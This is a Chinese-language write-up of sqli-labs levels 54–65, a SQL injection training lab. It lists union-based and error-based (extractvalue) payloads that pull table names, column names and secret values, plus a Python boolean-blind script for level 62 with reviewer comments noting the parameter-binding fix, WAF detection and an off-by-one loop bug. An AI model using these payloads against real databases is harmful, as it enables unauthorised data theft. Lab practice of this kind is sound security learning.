sqli-labs刷题(54-65)
54 无报错、无过滤,union 注入
ID:1
ID:1'
ID:1'--
ID:0' union select 1,2,3--
ID:0' union select 1,2,database()--
ID:0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--
ID:0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ildvytwz6d'--
ID:0' union select 1,2,secret_54Z4 from ildvytwz6d--
55
ID:1
ID:1'
ID:1'--
ID:1')--
ID:1")--
ID:1)--
ID:0) union select 1,2,3--
ID:0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--
ID:0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='evu5o2kvg8'--
ID:0) union select 1,2,secret_ZIST from evu5o2kvg8--
56
')
57
"
58 报错
ID:1'
ID:1' and extractvalue(1,concat(0x7e,(select user())))--
ID:1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--
ID:1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='97g4e9dy69')))--
ID:1' and extractvalue(1,concat(0x7e,(select secret_KZUH from 97g4e9dy69)))--
59
无闭合报错
60
")
闭合报错
61
'))
闭合报错
各个闭合方式的布尔盲注
62
脚本模板
import requests
# Lab exercise script for sqli-labs Less-62 (boolean-based blind probing of the
# database name, one character at a time, via binary search on its ASCII value).
# Reviewer note: the lab page is injectable only because the `id` value is
# concatenated into the SQL text; binding it as a parameter removes the
# injection point entirely, and the request pattern this script produces —
# many near-identical GETs differing only in the ascii()/mid() comparison —
# is the signature a WAF or access-log review would flag.
url0="http://sql.test/Less-62/?id=1') and "  # base URL; every probe appends one boolean condition to this prefix
databasename=''  # characters recovered so far; I had already found by hand, using length(), that the database name is 10 characters long
# NOTE(review): range(1,10) yields positions 1..9, so this loop probes nine
# characters; the comment above states the name has ten.
for i in range(1,10):
    # Search bounds on the printable ASCII range; `min`/`max` shadow the
    # builtins of the same name (harmless here, nothing in the script calls them).
    min = 33
    max = 127
    while(abs(min-max)>1):
        mid = (min + max)//2
        # Probe "is the ASCII code of character i greater than mid?"
        url = url0 + "(ascii((mid(database(),{},1)))>{})--+".format(i,mid)
        print(url)
        req = requests.get(url=url)
        # The presence of this string in the response is treated as the
        # condition having been true (narrow the lower bound); otherwise the
        # upper bound is narrowed.
        if ("Angelina" in req.text):
            min = mid
        else:
            max = mid
        # print(abs(min-max))
    # When the bounds are adjacent the value is `max` (invariant: min < code <= max).
    databasename+=chr(max)
print(databasename)
63 单引号闭合
'
64 双括号
))
65 单括号
)